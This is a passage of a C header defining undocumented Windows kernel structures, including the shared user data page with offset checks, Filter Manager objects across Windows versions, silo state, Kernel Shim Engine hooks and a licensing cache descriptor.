UCHAR NXSupportPolicy : 2;
UCHAR SEHValidationPolicy : 2;
UCHAR CurDirDevicesSkippedForDlls : 2;
UCHAR Reserved : 2;
};
};
UCHAR Reserved6[2];
volatile ULONG ActiveConsoleId;
volatile ULONG DismountCount;
ULONG ComPlusPackage;
ULONG LastSystemRITEventTickCount;
ULONG NumberOfPhysicalPages;
BOOLEAN SafeBootMode;
UCHAR VirtualizationFlags;
UCHAR Reserved12[2];
union {
ULONG SharedDataFlags;
struct {
ULONG DbgErrorPortPresent : 1;
ULONG DbgElevationEnabled : 1;
ULONG DbgVirtEnabled : 1;
ULONG DbgInstallerDetectEnabled : 1;
ULONG DbgLkgEnabled : 1;
ULONG DbgDynProcessorEnabled : 1;
ULONG DbgConsoleBrokerEnabled : 1;
ULONG DbgSecureBootEnabled : 1;
ULONG DbgMultiSessionSku : 1;
ULONG DbgMultiUsersInSessionSku : 1;
ULONG DbgStateSeparationEnabled : 1;
ULONG DbgSplitTokenEnabled : 1;
ULONG DbgShadowAdminEnabled : 1;
ULONG SpareBits : 19;
};
};
ULONG DataFlagsPad[1];
ULONGLONG TestRetInstruction;
LONGLONG QpcFrequency;
ULONG SystemCall;
ULONG SystemCallPad0;
ULONGLONG SystemCallPad[2];
union {
volatile KSYSTEM_TIME TickCount;
volatile ULONG64 TickCountQuad;
struct {
ULONG ReservedTickCountOverlay[3];
ULONG TickCountPad[1];
};
};
ULONG Cookie;
ULONG CookiedPad[1];
LONGLONG ConsoleSessionForegroundProcessId;
ULONGLONG TimeUpdateLock;
ULONGLONG BaselineSystemTimeQpc;
ULONGLONG BaselineInterruptTimeQpc;
ULONGLONG QpcSystemTimeIncrement;
ULONGLONG QpcInterruptTimeIncrement;
UCHAR QpcSystemTimeIncrementShift;
UCHAR QpcInterruptTimeIncrementShift;
USHORT UnparkedProcessorCount;
ULONG EnclaveFeatureMask[4];
union {
ULONG Reserved8;
ULONG TelemetryCoverageRound;
};
USHORT UserModeGlobalLogger[16];
ULONG ImageFileExecutionOptions;
ULONG LangGenerationCount;
ULONGLONG Reserved4;
volatile ULONG64 InterruptTimeBias;
volatile ULONG64 QpcBias;
ULONG ActiveProcessorCount;
volatile UCHAR ActiveGroupCount;
UCHAR Reserved9;
union {
USHORT QpcData;
struct {
UCHAR QpcBypassEnabled : 1;
UCHAR QpcShift : 1;
};
};
LARGE_INTEGER TimeZoneBiasEffectiveStart;
LARGE_INTEGER TimeZoneBiasEffectiveEnd;
XSTATE_CONFIGURATION XState;
KSYSTEM_TIME FeatureConfigurationChangeStamp;
ULONG Spare;
ULONG64 UserPointerAuthMask;
ULONG InternsReserved[210];
} KUSER_SHARED_DATA, *PKUSER_SHARED_DATA;
#include
#define USER_SHARED_DATA ((KUSER_SHARED_DATA * const)MM_SHARED_USER_DATA_VA)
#if !defined(__midl) && !defined(MIDL_PASS)
//
// The overall size can change, but it must be the same for all architectures.
//
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TickCountLowDeprecated) == 0x0);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TickCountMultiplier) == 0x4);
C_ASSERT(__alignof(KSYSTEM_TIME) == 4);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, InterruptTime) == 0x08);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemTime) == 0x014);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneBias) == 0x020);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ImageNumberLow) == 0x02c);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ImageNumberHigh) == 0x02e);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtSystemRoot) == 0x030);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, MaxStackTraceDepth) == 0x238);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, CryptoExponent) == 0x23c);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneId) == 0x240);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, LargePageMinimum) == 0x244);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, AitSamplingValue) == 0x248);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, AppCompatFlag) == 0x24c);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, RNGSeedVersion) == 0x250);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, GlobalValidationRunlevel) == 0x258);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneBiasStamp) == 0x25c);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtBuildNumber) == 0x260);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtProductType) == 0x264);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ProductTypeIsValid) == 0x268);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NativeProcessorArchitecture) == 0x26a);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtMajorVersion) == 0x26c);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NtMinorVersion) == 0x270);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ProcessorFeatures) == 0x274);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved1) == 0x2b4);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved3) == 0x2b8);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeSlip) == 0x2bc);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, AlternativeArchitecture) == 0x2c0);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemExpirationDate) == 0x2c8);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SuiteMask) == 0x2d0);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, KdDebuggerEnabled) == 0x2d4);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, MitigationPolicies) == 0x2d5);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ActiveConsoleId) == 0x2d8);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, DismountCount) == 0x2dc);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ComPlusPackage) == 0x2e0);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, LastSystemRITEventTickCount) == 0x2e4);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, NumberOfPhysicalPages) == 0x2e8);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SafeBootMode) == 0x2ec);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, VirtualizationFlags) == 0x2ed);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved12) == 0x2ee);
#if defined(_MSC_EXTENSIONS)
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SharedDataFlags) == 0x2f0);
#endif
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TestRetInstruction) == 0x2f8);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcFrequency) == 0x300);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemCall) == 0x308);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemCallPad0) == 0x30c);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, SystemCallPad) == 0x310);
#if defined(_MSC_EXTENSIONS)
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TickCount) == 0x320);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TickCountQuad) == 0x320);
#endif
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Cookie) == 0x330);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ConsoleSessionForegroundProcessId) == 0x338);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeUpdateLock) == 0x340);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, BaselineSystemTimeQpc) == 0x348);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, BaselineInterruptTimeQpc) == 0x350);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcSystemTimeIncrement) == 0x358);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcInterruptTimeIncrement) == 0x360);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcSystemTimeIncrementShift) == 0x368);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcInterruptTimeIncrementShift) == 0x369);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, UnparkedProcessorCount) == 0x36a);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, EnclaveFeatureMask) == 0x36c);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved8) == 0x37c);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, UserModeGlobalLogger) == 0x380);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ImageFileExecutionOptions) == 0x3a0);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, LangGenerationCount) == 0x3a4);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved4) == 0x3a8);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, InterruptTimeBias) == 0x3b0);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcBias) == 0x3b8);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ActiveProcessorCount) == 0x3c0);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, ActiveGroupCount) == 0x3c4);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, Reserved9) == 0x3c5);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, QpcData) == 0x3c6);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneBiasEffectiveStart) == 0x3c8);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, TimeZoneBiasEffectiveEnd) == 0x3d0);
C_ASSERT(FIELD_OFFSET(KUSER_SHARED_DATA, XState) == 0x3d8);
#endif /* __midl | MIDL_PASS */
/*
** KUSER_SHARED_DATA END
*/
/*
** MM UNLOADED DRIVERS START
*/
typedef struct _UNLOADED_DRIVERS {
UNICODE_STRING Name;
PVOID StartAddress;
PVOID EndAddress;
LARGE_INTEGER CurrentTime;
} UNLOADED_DRIVERS, *PUNLOADED_DRIVERS;
#define MI_UNLOADED_DRIVERS 50
/*
** MM UNLOADED DRIVERS END
*/
/*
** FLT MANAGER START
*/
typedef enum _FLT_FILTER_FLAGS {
FLTFL_MANDATORY_UNLOAD_IN_PROGRESS = 1,
FLTFL_FILTERING_INITIATED = 2,
FLTFL_NAME_PROVIDER = 4,
FLTFL_SUPPORTS_PIPES_MAILSLOTS = 8,
FLTFL_BACKED_BY_PAGEFILE = 16,
FLTFL_SUPPORTS_DAX_VOLUME = 32,
FLTFL_SUPPORTS_WCOS = 64,
FLTFL_FILTERS_READ_WRITE = 128,
} FLT_FILTER_FLAGS, *PFLT_FILTER_FLAGS;
typedef enum _FLT_OBJECT_FLAGS {
FLT_OBFL_DRAINING = 1,
FLT_OBFL_ZOMBIED = 2,
FLT_OBFL_TYPE_INSTANCE = 0x1000000,
FLT_OBFL_TYPE_FILTER = 0x2000000,
FLT_OBFL_TYPE_VOLUME = 0x4000000,
} FLT_OBJECT_FLAGS, *PFLT_OBJECT_FLAGS;
typedef struct _FLT_OBJECT {
ULONG Flags;
ULONG PointerCount;
EX_RUNDOWN_REF RundownRef;
LIST_ENTRY PrimaryLink;
} FLT_OBJECT, *PFLT_OBJECT;
// Since w10 th1
typedef struct _FLT_OBJECT_V2 {
ULONG Flags;
ULONG PointerCount;
EX_RUNDOWN_REF RundownRef;
LIST_ENTRY PrimaryLink;
GUID UniqueIdentifier;
} FLT_OBJECT_V2, *PFLT_OBJECT_V2; /* size: 0x0030 */
// Since w11 25h2
typedef struct _FLT_OBJECT_V3 {
ULONG Flags;
ULONG PointerCount;
EX_RUNDOWN_REF RundownRef;
LIST_ENTRY PrimaryLink;
PVOID RundownLog;
GUID UniqueIdentifier;
} FLT_OBJECT_V3, * PFLT_OBJECT_V3; /* size: 0x0038 */
typedef struct _FLT_OBJECT_LOG_ENTRY {
ULONG Action;
LONG Padding_25;
EX_RUNDOWN_REF RundownRef;
PVOID Stack[14];
} FLT_OBJECT_LOG_ENTRY, * PFLT_OBJECT_LOG_ENTRY; /* size: 0x0080 */
typedef struct _FLT_OBJECT_LOG {
LONG Index;
ULONG Reserved;
FLT_OBJECT_LOG_ENTRY Log[1024];
} FLT_OBJECT_LOG, * PFLT_OBJECT_LOG; /* size: 0x20008 */
typedef struct _FLT_SERVER_PORT_OBJECT {
LIST_ENTRY FilterLink;
PVOID ConnectNotify;
PVOID DisconnectNotify;
PVOID MessageNotify;
PVOID Filter;
PVOID Cookie;
ULONG Flags;
LONG NumberOfConnections;
LONG MaxConnections;
LONG __PADDING__[1];
} FLT_SERVER_PORT_OBJECT, *PFLT_SERVER_PORT_OBJECT; /* size: 0x0048 */
typedef struct _FLT_RESOURCE_LIST_HEAD {
ERESOURCE rLock;
LIST_ENTRY rList;
ULONG rCount;
LONG __PADDING__[1];
} FLT_RESOURCE_LIST_HEAD, *PFLT_RESOURCE_LIST_HEAD; /* size: 0x0080 */
typedef struct _FLT_MUTEX_LIST_HEAD {
FAST_MUTEX mLock;
LIST_ENTRY mList;
union {
ULONG mCount;
struct {
UCHAR mInvalid : 1;
CHAR __PADDING__[7];
};
};
} FLT_MUTEX_LIST_HEAD, *PFLT_MUTEX_LIST_HEAD; /* size: 0x0050 */
// Windows 7 version
typedef struct _FLT_FILTER_V1 {
/* 0x0000 */ FLT_OBJECT Base;
/* 0x0020 */ struct _FLTP_FRAME* Frame;
/* 0x0028 */ UNICODE_STRING Name;
/* 0x0038 */ UNICODE_STRING DefaultAltitude;
/* 0x0048 */ FLT_FILTER_FLAGS Flags;
/* 0x004c */ LONG Padding;
/* 0x0050 */ DRIVER_OBJECT* DriverObject;
/* 0x0058 */ FLT_RESOURCE_LIST_HEAD InstanceList;
/* 0x00d8 */ struct FLT_VERIFIER_EXTENSION* VerifierExtension;
/* 0x00e0 */ LIST_ENTRY VerifiedFiltersLink;
/* 0x00f0 */ PVOID FilterUnload /* function */;
/* 0x00f8 */ PVOID InstanceSetup /* function */;
/* 0x0100 */ PVOID InstanceQueryTeardown /* function */;
/* 0x0108 */ PVOID InstanceTeardownStart /* function */;
/* 0x0110 */ PVOID InstanceTeardownComplete /* function */;
/* 0x0118 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContextsListHead;
/* 0x0120 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContexts[6];
/* 0x0150 */ PVOID PreVolumeMount /* function */;
/* 0x0158 */ PVOID PostVolumeMount /* function */;
/* 0x0160 */ PVOID GenerateFileName /* function */;
/* 0x0168 */ PVOID NormalizeNameComponent /* function */;
/* 0x0170 */ PVOID NormalizeNameComponentEx /* function */;
/* 0x0178 */ PVOID NormalizeContextCleanup /* function */;
/* 0x0180 */ PVOID KtmNotification /* function */;
/* 0x0188 */ struct _FLT_OPERATION_REGISTRATION* Operations;
/* 0x0190 */ PVOID OldDriverUnload /* function */;
/* 0x0198 */ FLT_MUTEX_LIST_HEAD ActiveOpens;
/* 0x01e8 */ FLT_MUTEX_LIST_HEAD ConnectionList;
/* 0x0238 */ FLT_MUTEX_LIST_HEAD PortList;
/* 0x0288 */ EX_PUSH_LOCK PortLock;
} FLT_FILTER_V1, * PFLT_FILTER_V1; /* size: 0x0290 */
// Windows 8/8.1 version
typedef struct _FLT_FILTER_V2 {
/* 0x0000 */ FLT_OBJECT Base;
/* 0x0020 */ struct _FLTP_FRAME* Frame;
/* 0x0028 */ UNICODE_STRING Name;
/* 0x0038 */ UNICODE_STRING DefaultAltitude;
/* 0x0048 */ FLT_FILTER_FLAGS Flags;
/* 0x004c */ LONG Padding;
/* 0x0050 */ DRIVER_OBJECT* DriverObject;
/* 0x0058 */ FLT_RESOURCE_LIST_HEAD InstanceList;
/* 0x00d8 */ struct _FLT_VERIFIER_EXTENSION* VerifierExtension;
/* 0x00e0 */ LIST_ENTRY VerifiedFiltersLink;
/* 0x00f0 */ PVOID FilterUnload /* function */;
/* 0x00f8 */ PVOID InstanceSetup /* function */;
/* 0x0100 */ PVOID InstanceQueryTeardown /* function */;
/* 0x0108 */ PVOID InstanceTeardownStart /* function */;
/* 0x0110 */ PVOID InstanceTeardownComplete /* function */;
/* 0x0118 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContextsListHead;
/* 0x0120 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContexts[7];
/* 0x0158 */ PVOID PreVolumeMount /* function */;
/* 0x0160 */ PVOID PostVolumeMount /* function */;
/* 0x0168 */ PVOID GenerateFileName /* function */;
/* 0x0170 */ PVOID NormalizeNameComponent /* function */;
/* 0x0178 */ PVOID NormalizeNameComponentEx /* function */;
/* 0x0180 */ PVOID NormalizeContextCleanup /* function */;
/* 0x0188 */ PVOID KtmNotification /* function */;
/* 0x0190 */ PVOID SectionNotification /* function */; //SINCE 8.1
/* 0x0198 */ struct _FLT_OPERATION_REGISTRATION* Operations;
/* 0x01a0 */ PVOID OldDriverUnload /* function */;
/* 0x01a8 */ FLT_MUTEX_LIST_HEAD ActiveOpens;
/* 0x01f8 */ FLT_MUTEX_LIST_HEAD ConnectionList;
/* 0x0248 */ FLT_MUTEX_LIST_HEAD PortList;
/* 0x0298 */ EX_PUSH_LOCK PortLock;
} FLT_FILTER_V2, * PFLT_FILTER_V2; /* size: 0x02a0 */
// Windows 10 version
typedef struct _FLT_FILTER_V3 {
/* 0x0000 */ FLT_OBJECT_V2 Base;
/* 0x0030 */ struct _FLTP_FRAME* Frame;
/* 0x0038 */ UNICODE_STRING Name;
/* 0x0048 */ UNICODE_STRING DefaultAltitude;
/* 0x0058 */ FLT_FILTER_FLAGS Flags;
/* 0x005c */ LONG Padding;
/* 0x0060 */ DRIVER_OBJECT* DriverObject;
/* 0x0068 */ FLT_RESOURCE_LIST_HEAD InstanceList;
/* 0x00e8 */ struct _FLT_VERIFIER_EXTENSION* VerifierExtension;
/* 0x00f0 */ LIST_ENTRY VerifiedFiltersLink;
/* 0x0100 */ PVOID FilterUnload /* function */;
/* 0x0108 */ PVOID InstanceSetup /* function */;
/* 0x0110 */ PVOID InstanceQueryTeardown /* function */;
/* 0x0118 */ PVOID InstanceTeardownStart /* function */;
/* 0x0120 */ PVOID InstanceTeardownComplete /* function */;
/* 0x0128 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContextsListHead;
/* 0x0130 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContexts[7];
/* 0x0168 */ PVOID PreVolumeMount /* function */;
/* 0x0170 */ PVOID PostVolumeMount /* function */;
/* 0x0178 */ PVOID GenerateFileName /* function */;
/* 0x0180 */ PVOID NormalizeNameComponent /* function */;
/* 0x0188 */ PVOID NormalizeNameComponentEx /* function */;
/* 0x0190 */ PVOID NormalizeContextCleanup /* function */;
/* 0x0198 */ PVOID KtmNotification /* function */;
/* 0x01a0 */ PVOID SectionNotification /* function */;
/* 0x01a8 */ struct _FLT_OPERATION_REGISTRATION* Operations;
/* 0x01b0 */ PVOID OldDriverUnload /* function */;
/* 0x01b8 */ FLT_MUTEX_LIST_HEAD ActiveOpens;
/* 0x0208 */ FLT_MUTEX_LIST_HEAD ConnectionList;
/* 0x0258 */ FLT_MUTEX_LIST_HEAD PortList;
/* 0x02a8 */ EX_PUSH_LOCK PortLock;
} FLT_FILTER_V3, *PFLT_FILTER_V3; /* size: 0x02b0 */
// Windows 10/11+ (22000)
typedef struct _FLT_FILTER_V4 {
/* 0x0000 */ FLT_OBJECT_V2 Base;
/* 0x0030 */ struct _FLTP_FRAME* Frame;
/* 0x0038 */ UNICODE_STRING Name;
/* 0x0048 */ UNICODE_STRING DefaultAltitude;
/* 0x0058 */ FLT_FILTER_FLAGS Flags;
/* 0x005c */ LONG Padding;
/* 0x0060 */ DRIVER_OBJECT* DriverObject;
/* 0x0068 */ FLT_RESOURCE_LIST_HEAD InstanceList;
/* 0x00e8 */ struct _FLT_VERIFIER_EXTENSION* VerifierExtension;
/* 0x00f0 */ LIST_ENTRY VerifiedFiltersLink;
/* 0x0100 */ PVOID FilterUnload /* function */;
/* 0x0108 */ PVOID InstanceSetup /* function */;
/* 0x0110 */ PVOID InstanceQueryTeardown /* function */;
/* 0x0118 */ PVOID InstanceTeardownStart /* function */;
/* 0x0120 */ PVOID InstanceTeardownComplete /* function */;
/* 0x0128 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContextsListHead;
/* 0x0130 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContexts[7];
/* 0x0168 */ PVOID PreVolumeMount /* function */;
/* 0x0170 */ PVOID PostVolumeMount /* function */;
/* 0x0178 */ PVOID GenerateFileName /* function */;
/* 0x0180 */ PVOID NormalizeNameComponent /* function */;
/* 0x0188 */ PVOID NormalizeNameComponentEx /* function */;
/* 0x0190 */ PVOID NormalizeContextCleanup /* function */;
/* 0x0198 */ PVOID KtmNotification /* function */;
/* 0x01a0 */ PVOID SectionNotification /* function */;
/* 0x01a8 */ struct _FLT_OPERATION_REGISTRATION* Operations;
/* 0x01b0 */ PVOID OldDriverUnload /* function */;
/* 0x01b8 */ FLT_MUTEX_LIST_HEAD ActiveOpens;
/* 0x0208 */ FLT_MUTEX_LIST_HEAD ConnectionList;
/* 0x0258 */ FLT_MUTEX_LIST_HEAD PortList;
/* 0x02a8 */ EX_PUSH_LOCK_AUTO_EXPAND PortLock;
} FLT_FILTER_V4, * PFLT_FILTER_V4; /* size: 0x02b8 */
// Windows 11+ (27XXX)
typedef struct _FLT_FILTER_V5 {
/* 0x0000 */ FLT_OBJECT_V3 Base;
/* 0x0038 */ struct _FLTP_FRAME* Frame;
/* 0x0040 */ UNICODE_STRING Name;
/* 0x0050 */ UNICODE_STRING DefaultAltitude;
/* 0x0060 */ FLT_FILTER_FLAGS Flags;
/* 0x0064 */ LONG Padding;
/* 0x0068 */ DRIVER_OBJECT* DriverObject;
/* 0x0070 */ FLT_RESOURCE_LIST_HEAD InstanceList;
/* 0x00f0 */ struct _FLT_VERIFIER_EXTENSION* VerifierExtension;
/* 0x00f8 */ LIST_ENTRY VerifiedFiltersLink;
/* 0x0108 */ PVOID FilterUnload /* function */;
/* 0x0110 */ PVOID InstanceSetup /* function */;
/* 0x0118 */ PVOID InstanceQueryTeardown /* function */;
/* 0x0120 */ PVOID InstanceTeardownStart /* function */;
/* 0x0128 */ PVOID InstanceTeardownComplete /* function */;
/* 0x0130 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContextsListHead;
/* 0x0138 */ struct _ALLOCATE_CONTEXT_HEADER* SupportedContexts[7];
/* 0x0170 */ PVOID PreVolumeMount /* function */;
/* 0x0178 */ PVOID PostVolumeMount /* function */;
/* 0x0180 */ PVOID GenerateFileName /* function */;
/* 0x0188 */ PVOID NormalizeNameComponent /* function */;
/* 0x0190 */ PVOID NormalizeNameComponentEx /* function */;
/* 0x0198 */ PVOID NormalizeContextCleanup /* function */;
/* 0x01a0 */ PVOID KtmNotification /* function */;
/* 0x01a8 */ PVOID SectionNotification /* function */;
/* 0x01b0 */ struct _FLT_OPERATION_REGISTRATION* Operations;
/* 0x01b8 */ PVOID OldDriverUnload /* function */;
/* 0x01c0 */ FLT_MUTEX_LIST_HEAD ActiveOpens;
/* 0x0210 */ FLT_MUTEX_LIST_HEAD ConnectionList;
/* 0x0260 */ FLT_MUTEX_LIST_HEAD PortList;
/* 0x02b0 */ EX_PUSH_LOCK_AUTO_EXPAND PortLock;
} FLT_FILTER_V5, * PFLT_FILTER_V5; /* size: 0x02c0 */
typedef FLT_FILTER_V5 FLT_FILTER_COMPATIBLE;
typedef PFLT_FILTER_V5 PFLT_FILTER_COMPATIBLE;
/*
** FLT MANAGER END
*/
/*
** SILO START
*/
typedef struct _SYSTEM_ROOT_SILO_INFORMATION {
ULONG NumberOfSilos;
ULONG SiloIdList[1];
} SYSTEM_ROOT_SILO_INFORMATION, *PSYSTEM_ROOT_SILO_INFORMATION;
typedef struct _SILO_USER_SHARED_DATA {
ULONG ServiceSessionId;
ULONG ActiveConsoleId;
LONGLONG ConsoleSessionForegroundProcessId;
NT_PRODUCT_TYPE NtProductType;
ULONG SuiteMask;
ULONG SharedUserSessionId; // since RS2
BOOLEAN IsMultiSessionSku;
WCHAR NtSystemRoot[260];
USHORT UserModeGlobalLogger[16];
ULONG TimeZoneId; // since 21H2
LONG TimeZoneBiasStamp;
KSYSTEM_TIME TimeZoneBias;
LARGE_INTEGER TimeZoneBiasEffectiveStart;
LARGE_INTEGER TimeZoneBiasEffectiveEnd;
} SILO_USER_SHARED_DATA, *PSILO_USER_SHARED_DATA;
typedef struct _OBP_SYSTEM_DOS_DEVICE_STATE {
ULONG GlobalDeviceMap;
ULONG LocalDeviceCount[26];
} OBP_SYSTEM_DOS_DEVICE_STATE, *POBP_SYSTEM_DOS_DEVICE_STATE;
typedef struct _OBP_SILODRIVERSTATE {
PDEVICE_MAP SystemDeviceMap;
OBP_SYSTEM_DOS_DEVICE_STATE SystemDosDeviceState;
EX_PUSH_LOCK DeviceMapLock;
OBJECT_NAMESPACE_LOOKUPTABLE PrivateNamespaceLookupTable;
} OBP_SILODRIVERSTATE, *POBP_SILODRIVERSTATE;
typedef struct _OBP_SILODRIVERSTATE_V2 {
EX_FAST_REF SystemDeviceMap;
OBP_SYSTEM_DOS_DEVICE_STATE SystemDosDeviceState;
EX_PUSH_LOCK DeviceMapLock;
OBJECT_NAMESPACE_LOOKUPTABLE PrivateNamespaceLookupTable;
} OBP_SILODRIVERSTATE_V2, * POBP_SILODRIVERSTATE_V2; /* size: 0x02e0 */
//incomplete, values not important, change between versions.
typedef struct _ESERVERSILO_GLOBALS {
OBP_SILODRIVERSTATE ObSiloState;
//incomplete
} ESERVERSILO_GLOBALS, *PESERVERSILO_GLOBALS;
/*
** SILO END
*/
/*
** KSE START
*/
typedef enum _KSE_DISABLE_FLAGS {
DisableNone = 0,
DisableDriverShims = 1,
DisableDeviceShims = 2,
MaxDisableFlags
} KSE_DISABLE_FLAGS;
typedef enum _KSE_STATE {
KseNotReady = 0,
KseInProgress = 1,
KseReady = 2
} KSE_STATE;
#define KseFlagsNone 0x0000
#define KseFlagsGroupPolicyOk 0x0002
#define KseFlagsVerifierEnabled 0x0040
#define KseFlagsNoDb 0x0080
#define KseFlagsInitSafeMode 0x0100
#define KseFlagsDrvShimActive 0x0800
#define KseFlagsDevShimsActive 0x1000
#if _MSC_VER >= 1200
#pragma warning(push)
#pragma warning(disable:4324) // structure was padded due to __declspec(align())
#endif
typedef struct DECLSPEC_ALIGN(MEMORY_ALLOCATION_ALIGNMENT)_KSE_ENGINE {
KSE_DISABLE_FLAGS DisableFlags;
KSE_STATE State;
ULONG Flags; //KseFlags*
LIST_ENTRY ProvidersListHead;
LIST_ENTRY ShimmedDriversListHead;
PVOID KseGetIoCallbacksRoutine;
PVOID KseSetCompletionHookRoutine;
PVOID DeviceInfoCache;
PVOID HardwareIdCache;
PVOID ShimmedDriverHint;
} KSE_ENGINE, * PKSE_ENGINE;
#if _MSC_VER >= 1200
#pragma warning(pop)
#endif
typedef struct _KSE_SHIM {
ULONG Size;
GUID* Guid;
PWCHAR Name;
PVOID KseCallbackRoutines;
PVOID RemoveNotificationRoutine;
PVOID ApplyNotificationRoutine;
PVOID HookCollectionsArray;
} KSE_SHIM, * PKSE_SHIM;
typedef enum _KSE_HOOK_COLLECTION_TYPE {
HookNtOsImport = 0,
HookHalImport = 1,
HookNamedModuleImports = 2,
HookCallbacks = 3,
HookLastCollection = 4
} KSE_HOOK_COLLECTION_TYPE;
typedef struct _KSE_HOOK_COLLECTION {
KSE_HOOK_COLLECTION_TYPE Type;
PWCHAR TargetDriverName;
PVOID HookArray;
} KSE_HOOK_COLLECTION, * PKSE_HOOK_COLLECTION;
typedef enum _KSE_HOOK_TYPE {
HookFunction = 0,
HookIrpCallback = 1,
HookLast = 2
} KSE_HOOK_TYPE, * PKSE_HOOK_TYPE;
typedef struct _KSE_HOOK {
KSE_HOOK_TYPE Type;
union {
PCHAR FunctionName;
ULONG CallbackId;
} DUMMYUNION;
PVOID HookFunction;
PVOID OriginalFunction;
} KSE_HOOK, * PKSE_HOOK;
typedef struct _KSE_PROVIDER {
LIST_ENTRY ProviderList;
PKSE_SHIM Shim;
} KSE_PROVIDER, * PKSE_PROVIDER;
typedef struct _KSE_SHIMMED_DRIVER {
LIST_ENTRY ListEntry;
PVOID DriverBaseAddress;
ULONG RefCount;
GUID* ShimGuid;
//incomplete
} KSE_SHIMMED_DRIVER, * PKSE_SHIMMED_DRIVER;
/*
** KSE END
*/
/*
** SOFTWARE LICENSING START
*/
#pragma pack(push, 1)
typedef struct _SL_CACHE_VALUE_DESCRIPTOR {
USHORT Size;
USHORT NameLength;
USHORT Type;
USHORT DataLength;
ULONG Attributes;
ULONG Reserved;
WCHAR Name[ANYSIZE_ARRAY];
} SL_CACHE_VALUE_DESCRIPTOR, *PSL_CACHE_VALUE_DESCRIPTOR;
typedef SL_CACHE_VALUE_DESCRIPTOR SL_KMEM_CACHE_VALUE_DESCRIPTOR;
#pragma pack(pop)
